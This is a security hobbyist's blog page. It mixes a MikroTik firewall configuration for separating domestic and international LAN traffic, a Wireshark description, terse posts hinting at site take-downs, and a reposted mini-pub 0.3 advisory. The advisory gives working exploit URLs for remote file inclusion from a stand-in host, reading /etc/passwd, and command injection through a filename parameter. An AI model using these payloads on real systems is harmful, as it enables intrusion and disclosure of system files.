Path to improvements :: Sec. Things

November 6, 2009

Berikut adalah konfigurasi sederhana pada Mikrotik ROS yang diminta oleh rekan saya, berfungsi untuk memisahkan layanan Client LAN meskipun menggunakan 1 upstream dengan layanan yang sama (SP**DY ADSL).

INTERNET --- ROUTER --- CLIENT ( IIX Only dan MIX )

Konfigurasi :

MODEM ADSL = 192.168.1.1/24

Router to ADSL modem : 192.168.1.2/24

Router to LAN : 192.168.0.1/24

***** Konfigurasi *****

/interface set ether1 name=uplink disabled=no
/interface set ether2 name=downlink disabled=no
/ip address add address=192.168.1.2/24 interface=uplink comment="UPLINK"
/ip address add address=192.168.0.1/24 interface=downlink comment="DOWNLINK"
/ip route add gateway=192.168.1.1 comment="TO-MODEM" disabled=no

/ip firewall address-list add address=32.0.0.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=32.234.168.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=32.234.170.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=32.234.171.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=32.234.172.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=32.234.173.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=32.234.175.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.0.0.0/8 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.65.240.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.65.241.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.65.242.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.65.244.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.65.245.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.65.246.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.65.247.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.168.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.169.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.170.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.171.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.172.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.173.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.174.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.145.175.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.188.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.191.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.191.0/29 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.191.24/29 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.191.32/29 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.191.44/30 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.191.48/29 list=iix-sp8 disabled=no
/ip firewall address-list add address=58.147.191.64/27 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.0.0.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.253.96.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.253.97.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.253.98.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.253.99.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.253.100.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.253.101.0/24 list=iix-sp8 disabled=no
/ip firewall address-list add address=60.253.102.0/24 list=iix-sp8 disabled=no
[ address list selengkapnya bisa di download di sini ]

/ip firewall address-list add address=192.168.0.10-192.168.0.20 list=svc-iix disabled=no
/ip firewall address-list add address=192.168.0.30-192.168.0.40 list=svc-intl disabled=no
/ip firewall address-list add address=192.168.1.1-192.168.1.2 list=MGMT disabled=no
/ip firewall address-list add address=192.168.0.1 list=MGMT disabled=no
/system note set note="\n\n\n********** config generated by spikecursed **********\n\n\n" show-at-login=yes
/ip firewall filter add chain=forward dst-address-list=MGMT protocol=tcp action=accept comment="ALLOW-TCP-ANY2MGMT"
/ip firewall filter add chain=forward dst-address-list=MGMT protocol=icmp action=accept comment="ALLOW-ICMP-ANY2MGMT"
/ip firewall filter add chain=forward src-address-list=svc-iix dst-address-list=iix-sp8 action=accept comment="ALLOW-IIX2IIX"
/ip firewall filter add chain=forward src-address-list=svc-intl dst-address-list=iix-sp8 action=accept comment="ALLOW-INTL2IIX"
/ip firewall filter add chain=forward src-address-list=svc-intl dst-address-list=!iix-sp8 action=accept comment="ALLOW-INTL2ANY"
/ip firewall filter add chain=forward src-address-list=svc-iix dst-address-list=!iix-sp8 action=drop comment="NO-IIX2ANY"
/ip firewall filter add chain=forward src-address-list=svc-iix dst-address-list=svc-intl action=drop comment="NO-SLICE"
/ip firewall nat add chain=srcnat action=masquerade out-interface=uplink

Set IP Address pada sisi client untuk menggunakan ip sesuai dengan layanan yang telah di deskripsikan pada address list untuk client (svc-iix atau svc-intl).

Semoga informasi sederhana ini dapat bermanfaat.

Posted in IT Things, Sec. Things | No Comments »

Page copy protected against web site content infringement by Copyscape

dkp - test

June 4, 2009

another take down ... i still can do it.

Posted in Nop, IT Things, Sec. Things | No Comments »

Protected: Phantom minor hack

June 1, 2009

Posted in IT Things, Sec. Things | Enter your password to view comments

Mini-pub 0.3 multiple vulnerabilities

October 13, 2008

mini-pub 0.3 multiple vulnerabilities 
	download   http://sourceforge.net/projects/mini-pub/  
	author     muuratsalo contact    muuratsalo[at]gmail.com  
	 
	exploits :
	1. local file disclosure 
	http://localhost/mini-pub.php/front-end/img.php?sFileName=http://site.com/cmd.txt?  
	 
	2. local file disclosure 
	http://localhost/mini-pub.php/front-end/cat.php?sFileName=/etc/passwd  
	 
	3. command execution 
	http://localhost/mini-pub.php/front-end/cat.php?sFileName=a%3Benv

Posted in Sec. Things | No Comments »

Wireshark Protocol Analyzer / Sniffing tool

September 18, 2008

Wireshark is the world's foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions.

Wireshark development thrives thanks to the contributions of networking experts across the globe. It is the continuation of a project that started in 1998.

Wireshark has a rich feature set which includes the following:

Deep inspection of hundreds of protocols, with more being added all the time
Live capture and offline analysis
Standard three-pane packet browser
Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others
Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility
The most powerful display filters in the industry
Rich VoIP analysis
Read/write many different capture file formats: tcpdump (libpcap), Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments Observer, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others
Capture files compressed with gzip can be decompressed on the fly
Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platfrom)
Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2
Coloring rules can be applied to the packet list for quick, intuitive analysis
Output can be exported to XML, PostScript®, CSV, or plain text